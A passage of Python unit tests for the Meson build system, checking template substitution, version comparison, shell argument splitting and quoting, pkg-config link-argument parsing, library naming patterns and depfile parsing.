self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.options[OptionKey('link_args', lang='c')] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[-1] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[-1] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[-1] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(sorted(deps), sorted(expdeps))
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
